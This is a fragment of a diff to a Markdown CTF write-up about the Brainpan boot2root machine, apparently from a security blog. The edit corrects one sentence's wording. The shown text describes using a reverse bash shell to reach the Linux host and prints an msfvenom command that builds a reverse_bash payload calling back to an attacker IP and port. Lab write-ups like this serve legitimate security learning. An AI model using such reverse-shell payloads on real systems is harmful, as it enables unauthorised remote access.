PacketFire/packetfire_site/content/post/brainpan-boot2root-writeup.md

 With a little digging, I was excited to find that I could execute commands on this linux machine.
 With this in mind I decided to leverage a reverse bash shell to migrate into the underlying linux host.

-To facilitate this, I generated the shell using msfvenom again before executing this using this directly through `bash`.
+To facilitate this, I generated the shell using msfvenom again before executing this directly through `bash`.

 ```
 root@kali:~/ctf# msfvenom -p cmd/unix/reverse_bash LHOST=10.10.176.118 LPORT=4443